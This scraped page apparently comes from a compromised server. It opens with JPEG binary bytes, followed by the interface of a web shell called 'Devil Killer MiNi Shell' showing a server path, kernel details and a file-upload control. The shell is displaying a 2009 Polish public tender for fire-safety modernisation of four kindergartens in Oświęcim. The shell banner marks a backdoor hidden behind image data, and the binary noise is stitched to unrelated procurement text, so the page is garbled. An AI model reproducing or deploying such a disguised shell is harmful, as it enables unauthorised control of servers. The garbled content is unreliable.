JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090527/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090527/170118-N-2009.html

<p class="kh_header"><b>Oświęcim: Modernizacja  i dostosowanie budynków MP-7,14,15,16, w Oświęcimiu do wymogów p/poż</b><br>
<b>Numer ogłoszenia: 170118 - 2009; data zamieszczenia: 27.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Szkół i Przedszkoli Miejskich , ul. Królowej Jadwigi 12a, 32-602 Oświęcim, woj. małopolskie, tel. 033 8423963, faks 033 8422505.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsipm.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Miejska Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja  i dostosowanie budynków MP-7,14,15,16, w Oświęcimiu do wymogów p/poż.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1:  Modernizacja  i dostosowanie budynku MP-7 (Miejskiego Przedszkola nr 7)do wymogów p/poż 
   
Przedmiot zamówienia obejmuje:

 wykonanie instalacji systemu oddymiania :
- wymiana dwóch okien w klatce schodowej do celów oddymiania
-montaż siłowników łańcuchowych do okien
-montaż  przycisków ręcznego uruchamiania oddymiania
-montaż optycznych  czujek dymu dających możliwość automatycznego  
 uruchamiania
- montaż centrali sterowania wraz z akumulatorami
- montaż przewodów  instalacji oddymiania w bruzdach
- montaż przewodów instalacji zasilającej bruzdach z zabezpieczeniem. 
- wykonanie prób i pomiarów elektrycznych
- wykucie bruzd
- zamurowanie i zatynkowanie bruzd.
- wykonanie robót budowlanych, wykończeniowych (blacharskich tynkarskich ,  
  malarskich)    
   związanych z wymianą okien
- wywiezienie gruzu

  wykonanie ścianek przeciwpożarowych  wydzielających klatkę schodową :
- Wykonanie ścianki przeciwpożarowej o odporności ogniowej EI-60 wraz drzwiami
  pożarowymi o odporności ogniowej EI-30 na parterze budynku  oddzielającą      
  klatkę schodową od pozostałej części przedszkola
- Wykonanie ścianki przeciwpożarowej o odporności ogniowej EI-60 wraz drzwiami
   pożarowymi o odporności ogniowej EI-30 na I piętrze budynku oddzielając część
   przedszkolną  I p.od klatki schodowej
- Wymianę drzwi z przedpokoju przy kancelarii na drzwi o klasie odporności
  ogniowej co najmniej EI-30
- Wykonanie nadproży nad drzwiami 
- wykonanie robót budowlanych, wykończeniowych (blacharskich tynkarskich ,  
   malarskich) związanych z wymianą drzwi
- wywiezienie gruzu

wykonanie instalacji hydrantowej wraz z wyposażeniem w poziomie piwnic :
- montaż rurociągów instalacji  hydrantowej
- montaż zaworów
- montaż skrzynki hydrantowej z kompletnym wyposażeniem
 
Zadanie nr 2:   Modernizacja  i dostosowanie budynku MP-14 (Miejskiego Przedszkola nr 14)do wymogów p/poż 
Przedmiot zamówienia obejmuje:

 wykonanie instalacji systemu oddymiania : (w dwóch klatkach schodowych)
- wymiana dwóch okien w klatce schodowej  głównej  i jednego  w klatce  
  schodowej bocznej   do celów oddymiania
-montaż siłowników łańcuchowych do okien
-montaż  przycisków ręcznego uruchamiania oddymiania
-montaż optycznych  czujek dymu dających możliwość automatycznego 
 uruchamiania
- montaż centrali sterowania wraz z akumulatorami
- montaż przewodów  instalacji oddymiania w bruzdach
- montaż przewodów instalacji zasilającej bruzdach z zabezpieczeniem. 
- wykonanie prób i pomiarów elektrycznych
- wykucie bruzd
- zamurowanie i zatynkowanie bruzd.
- wykonanie robót budowlanych, wykończeniowych (blacharskich tynkarskich ,   
  malarskich) związanych z wymianą okien
- wywiezienie gruzu
-wykonanie malowania sali zabaw :
- Demontaż istniejących boazerii 
- uzupełnienie tynków
- gładzie gipsowe na ścianach i sufitach
- malowanie ścian i sufitów farbami emulsyjnymi

wykonanie instalacji oświetlenia ewakuacyjnego  :
- odłączanie  przewodów
- montaż  przewodów
- montaż lamp
- połączenie przewodów
-wykucie bruzd 
-zaprawienie bruzd
-sprawdzenie i pomiar instalacji

Zadanie nr 3:   Modernizacja  i dostosowanie budynku MP-15 (Miejskiego Przeszkola nr 15) do wymogów p/poż 
Przedmiot zamówienia obejmuje:
 wykonanie instalacji systemu oddymiania : (w dwóch klatkach schodowych)
- wymiana dwóch okien w klatce schodowej  głównej  i jednego  w klatce  
   schodowej bocznej   do celów oddymiania
-montaż siłowników łańcuchowych do okien
-montaż  przycisków ręcznego uruchamiania oddymiania
-montaż optycznych  czujek dymu dających możliwość automatycznego  
 uruchamiania
- montaż centrali sterowania wraz z akumulatorami
- montaż przewodów  instalacji oddymiania w bruzdach
- montaż przewodów instalacji zasilającej bruzdach z zabezpieczeniem. 
- wykonanie prób i pomiarów elektrycznych
- wykucie bruzd
- zamurowanie i zatynkowanie bruzd.
- wykonanie robót budowlanych, wykończeniowych (blacharskich tynkarskich ,  
  malarskich) związanych z wymianą okien
- wywiezienie gruzu
wykonanie instalacji oświetlenia ewakuacyjnego  :
- odłączanie  przewodów
- montaż  przewodów
- montaż lamp
- połączenie przewodów
-wykucie bruzd 
-zaprawienie bruzd
-sprawdzenie i pomiar instalacji

Zadanie nr 4:   Modernizacja  i dostosowanie budynku MP-16 ( Miejskiego Przedszkola nr 16) do wymogów p/poż 
Przedmiot zamówienia obejmuje:
 wykonanie instalacji systemu oddymiania : (w dwóch klatkach schodowych)
- wymiana okna w klatce schodowej  głównej na podwójne do celów oddymiania
-  wykucie otworu i montaż  nowego większego okna dla celów oddymiania
   w klatce schodowej bocznej   
-montaż siłowników łańcuchowych do okien
-montaż  przycisków ręcznego uruchamiania oddymiania
-montaż optycznych  czujek dymu dających możliwość automatycznego 
 uruchamiania
- montaż centrali sterowania wraz z akumulatorami
- montaż przewodów  instalacji oddymiania w bruzdach
- montaż przewodów instalacji zasilającej bruzdach z zabezpieczeniem. 
- wykonanie prób i pomiarów elektrycznych
- wykucie starego okna 
- zamurowanie części otworu po starym oknie
- wykonanie nowego nadproża nad oknem
- wykucie bruzd
- zamurowanie i zatynkowanie bruzd.
- wykonanie robót budowlanych, wykończeniowych (blacharskich tynkarskich ,  
  malarskich) związanych z wymianą okien
- wywiezienie gruzu.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.31.21.00-8, 45.34.30.00-3, 45.44.21.00-8, 45.42.11.41-4, 45.42.11.31-1, 45.45.30.00-7, 45.31.56.00-4, 38.43.12.00-7, 42.52.10.00-4, 45.00.00.00-7, 45.30.00.00-0, 45.31.00.00-3, 45.31.11.00-1, 45.40.00.00-1, 45.42.00.00-7, 45.45.00.00-6, 45.33.00.00-9, 45.33.24.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie wymagane wniesienie wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O zamówienie mogą ubiegać się wykonawcy, którzy:
nie podlegają wykluczeniu na podstawie przepisów art. 24 ust. 1 i 2 oraz spełniają warunki określone w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz.U. z 2007 r. Nr 223, poz. 1655 ze zmianą Dz. U. z 2008 r. Nr 171 poz. 1058 oraz Dz. U. Nr 220, poz. 1420).

2. Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana w oparciu o następujące kryteria:
- posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
- posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia i zrealizowali w ostatnich 5 latach 1 robotę budowlaną odpowiadającą robocie budowlanej stanowiącej przedmiot zamówienia.
- znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia

3. Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły(spełnia - nie spełnia)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta musi zawierać następujące oświadczenia i dokumenty:

1. W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania   
    działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24:

a)  Oświadczenie, że
- spełnia warunki udziału w postępowaniu , o którym mowa w rozdz. VI specyfikacji
- posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli  ustawy nakładają obowiązek posiadania takich uprawnień,
- posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. W przypadku wybrania drugiej opcji Wykonawca winien dołączyć do oferty pisemne zobowiązanie, o którym mowa w cyt. wyżej przepisie, - znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
- nie podlega wykluczeniu z postępowania o udzielenie zamówienia.
b) aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej  niż 6 miesięcy przed upływem terminu składania ofert.
 2. W celu potwierdzenia warunku posiadania przez Wykonawcę niezbędnej wiedzy
i doświadczenia oraz dysponowania osobami zdolnymi do wykonania zamówienia:
 
a) Wykaz wykonanej w ciągu ostatnich 5 lat conajmniej jednej roboty budowlanej a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadającej swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem jej wartości, daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że robota ta została wykonana  należycie.

b)  Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia do wykonania zamówienia wraz z
- kserokopią uprawnień budowlanych kierownika budowy   w specjalności  konstrukcyjno budowlanej 
- kserokopią uprawnień  kierownika robót w specjalności sanitarnej obejmującej roboty wodnokanalizacyjne ,c.o i gazowe
- kserokopią uprawnień  kierownika robót w specjalności  -  instalacji elektrycznych
oraz aktualne zaświadczeniem o wpisie do właściwych  Okręgowych  Izb Samorządu Zawodowego.

3. W celu potwierdzenia warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej  i finansowej zapewniającej wykonanie zamówienia:

a)  Oświadczenie , o którym mowa w punkcie 1a.

b)  Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia  Społecznego potwierdzające odpowiednio ,że wykonawca nie zalega z opłacaniem  podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że  uzyskał przewidziane  prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych  płatności lub wstrzymanie w całości wykonania decyzji właściwego organu 
- wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

4.  Ponadto Wykonawca winien złożyć z ofertą:

a) Pełnomocnictwo osób podpisujących ofertę w imieniu firmy składającej ofertę, które winno być przedstawione w formie oryginału lub kopii.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia:
     -  są zobowiązani ustanowić Pełnomocnika do  reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. (np. wspólnicy spółki  cywilnej oraz członkowie konsorcjum),
 -  ponoszą solidarną odpowiedzialność za wykonanie umowy. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z przedsiębiorcą występującym jako pełnomocnik pozostałych (lider).

b) Zobowiązanie wykonawcy do spełnienia odpowiednich świadczeń na wypadek gdyby w oznaczonym terminie ujawniły się wady fizyczne wykonanych robót i usług tj. dokument gwarancyjny (karta gwarancyjna lub umowa gwarancyjna) określający szczegółowe warunki gwarancji oraz odpowiedzialność gwaranta.
W treści tego dokumentu  winny znaleźć się m.in. okres gwarancji obejmujący pełny zakres przedmiotu zamówienia, terminy usuwania stwierdzonych wad i usterek, wskazanie świadczeń gwaranta na rzecz Zamawiającego oraz warunki odpowiedzialności gwaranta. 
 Wymagany przez Zamawiającego minimalny okres gwarancji obejmujący pełny zakres  
  przedmiotu zamówienia: minimum 36 miesięcy licząc od daty odbioru końcowego  
  dokonanego przez Zamawiającego.

c)  zestawienie planowanych kosztów (kosztorys ofertowy)

d) wykaz części zamówienia, której wykonanie Wykonawca powierzy podwykonawcom.
    Zgodnie z art. 6471 Kodeksu Cywilnego Wykonawca winien uzyskać zgodę   
    Zamawiającego na zawarcie umów z podwykonawcami -na zasadach określonych w rozdz. XV pkt 6 specyfikacji.

5. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w  § 1 ust. 1 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów,  jakich może żądać  zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane ,  (Dz. U. z 2006 r. Nr 87 poz. 605 zm. Dz. U. z 2008 r. Nr 188, poz. 1155 ) składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, dokument ten winien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
    Jeżeli w kraju pochodzenia osoby lub w kraju , w którym Wykonawca ma siedzibę lub  miejsce zamieszkania nie wydaje się dokumentów , o  których mowa w §  1 ust.1  w/w rozporządzenia, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu  zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju , w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

6. Każdy z podmiotów występujących wspólnie zobowiązany jest do złożenia oświadczeń    
i dokumentów określonych w rozdz. VI, z tym, że dokumenty wskazane w rozdz. VI pkt. 4 i 5 może złożyć jeden z podmiotów występujących wspólnie

7.Wykaz  podmiotów , które będą uczestniczyć w wykonywaniu zamówienia  
   (podwykonawców).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zsipm.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Szkół i Przedszkoli Miejskich w Oświęcimiu
ul. Królowej Jadwigi 12a,
32-600 Oświęcim.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.06.2009 godzina 10:00, miejsce: Zarząd Szkół i Przedszkoli Miejskich w Oświęcimiu
ul. Królowej Jadwigi 12a, sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1:   Modernizacja  i dostosowanie budynku MP-7 do wymogów p/poż.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:

 wykonanie instalacji systemu oddymiania :
- wymiana dwóch okien w klatce schodowej do celów oddymiania
-montaż siłowników łańcuchowych do okien
-montaż  przycisków ręcznego uruchamiania oddymiania
-montaż optycznych  czujek dymu dających możliwość automatycznego uruchamiania
- montaż centrali sterowania wraz z akumulatorami
- montaż przewodów  instalacji oddymiania w bruzdach
- montaż przewodów instalacji zasilającej bruzdach z zabezpieczeniem. 
- wykonanie prób i pomiarów elektrycznych
- wykucie bruzd
- zamurowanie i zatynkowanie bruzd.
- wykonanie robót budowlanych, wykończeniowych (blacharskich tynkarskich , malarskich)    
   związanych z wymianą okien
- wywiezienie gruzu

wykonanie ścianek przeciwpożarowych  wydzielających klatkę schodową :
- Wykonanie ścianki przeciwpożarowej o odporności ogniowej EI-60 wraz drzwiami
  pożarowymi o odporności ogniowej EI-30 na parterze budynku  oddzielającą  klatkę
  schodową od pozostałej części przedszkola
- Wykonanie ścianki przeciwpożarowej o odporności ogniowej EI-60 wraz drzwiami
   pożarowymi o odporności ogniowej EI-30 na I piętrze budynku oddzielając część
   przedszkolną  I p.od klatki schodowej
- Wymianę drzwi z przedpokoju przy kancelarii na drzwi o klasie odporności
  ogniowej co najmniej EI-30
- Wykonanie nadproży nad drzwiami 
- wykonanie robót budowlanych, wykończeniowych (blacharskich tynkarskich , malarskich) 
   związanych z wymianą drzwi
- wywiezienie gruzu


wykonanie instalacji hydrantowej wraz z wyposażeniem w poziomie piwnic :
- montaż rurociągów instalacji  hydrantowej
- montaż zaworów
- montaż skrzynki hydrantowej z kompletnym wyposażeniem.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.21.00-8, 45.00.00.00-7, 45.30.00.00-0, 45.31.00.00-3, 45.31.11.00-1, 38.43.12.00-7, 45.31.56.00-4, 42.52.10.00-4, 45.40.00.00-1, 45.42.00.00-7, 45.33.00.00-9, 45.33.24.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2:   Modernizacja  i dostosowanie budynku MP-14 do wymogów p/poż..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:

 wykonanie instalacji systemu oddymiania : (w dwóch klatkach schodowych)

- wymiana dwóch okien w klatce schodowej  głównej  i jednego  w klatce schodowej 
  bocznej   do celów oddymiania
-montaż siłowników łańcuchowych do okien
-montaż  przycisków ręcznego uruchamiania oddymiania
-montaż optycznych  czujek dymu dających możliwość automatycznego uruchamiania
- montaż centrali sterowania wraz z akumulatorami
- montaż przewodów  instalacji oddymiania w bruzdach
- montaż przewodów instalacji zasilającej bruzdach z zabezpieczeniem. 
- wykonanie prób i pomiarów elektrycznych
- wykucie bruzd
- zamurowanie i zatynkowanie bruzd.
- wykonanie robót budowlanych, wykończeniowych (blacharskich tynkarskich , malarskich)    
   związanych z wymianą okien
- wywiezienie gruzu

wykonanie malowania sali zabaw :

- Demontaż istniejących boazerii 
- uzupełnienie tynków
- gładzie gipsowe na ścianach i sufitach
- malowanie ścian i sufitów farbami emulsyjnymi



wykonanie instalacji oświetlenia ewakuacyjnego  :
- odłączanie  przewodów
- montaż  przewodów
- montaż lamp
- połączenie przewodów
-wykucie bruzd 
-zaprawienie bruzd
-sprawdzenie i pomiar instalacji.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.21.00-8, 45.00.00.00-7, 45.30.00.00-0, 45.31.00.00-3, 45.31.11.00-1, 38.43.12.00-7, 45.31.56.00-4, 42.52.10.00-4, 45.40.00.00-1, 45.42.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3:   Modernizacja  i dostosowanie budynku MP-15 do wymogów p/poż..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:

 wykonanie instalacji systemu oddymiania : (w dwóch klatkach schodowych)
- wymiana dwóch okien w klatce schodowej  głównej  i jednego  w klatce schodowej 
  bocznej   do celów oddymiania
-montaż siłowników łańcuchowych do okien
-montaż  przycisków ręcznego uruchamiania oddymiania
-montaż optycznych  czujek dymu dających możliwość automatycznego uruchamiania
- montaż centrali sterowania wraz z akumulatorami
- montaż przewodów  instalacji oddymiania w bruzdach
- montaż przewodów instalacji zasilającej bruzdach z zabezpieczeniem. 
- wykonanie prób i pomiarów elektrycznych
- wykucie bruzd
- zamurowanie i zatynkowanie bruzd.
- wykonanie robót budowlanych, wykończeniowych (blacharskich tynkarskich , malarskich)    
   związanych z wymianą okien
- wywiezienie gruzu

wykonanie instalacji oświetlenia ewakuacyjnego  :
- odłączanie  przewodów
- montaż  przewodów
- montaż lamp
- połączenie przewodów
-wykucie bruzd 
-zaprawienie bruzd
-sprawdzenie i pomiar instalacji.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.21.00-8, 45.00.00.00-7, 45.30.00.00-0, 45.31.00.00-3, 45.31.11.00-1, 38.43.12.00-7, 45.31.56.00-4, 42.52.10.00-4, 45.40.00.00-1, 45.42.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4:   Modernizacja  i dostosowanie budynku MP-16 do wymogów p/poż..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:

 wykonanie instalacji systemu oddymiania : (w dwóch klatkach schodowych)
- wymiana okna w klatce schodowej  głównej na podwójne do celów oddymiania
-  wykucie otworu i montaż  nowego większego okna dla celów oddymiania
   w klatce schodowej bocznej   
-montaż siłowników łańcuchowych do okien
-montaż  przycisków ręcznego uruchamiania oddymiania
-montaż optycznych  czujek dymu dających możliwość automatycznego uruchamiania
- montaż centrali sterowania wraz z akumulatorami
- montaż przewodów  instalacji oddymiania w bruzdach
- montaż przewodów instalacji zasilającej bruzdach z zabezpieczeniem. 
- wykonanie prób i pomiarów elektrycznych
- wykucie starego okna 
- zamurowanie części otworu po starym oknie
- wykonanie nowego nadproża nad oknem
- wykucie bruzd
- zamurowanie i zatynkowanie bruzd.
- wykonanie robót budowlanych, wykończeniowych (blacharskich tynkarskich , malarskich)    
   związanych z wymianą okien
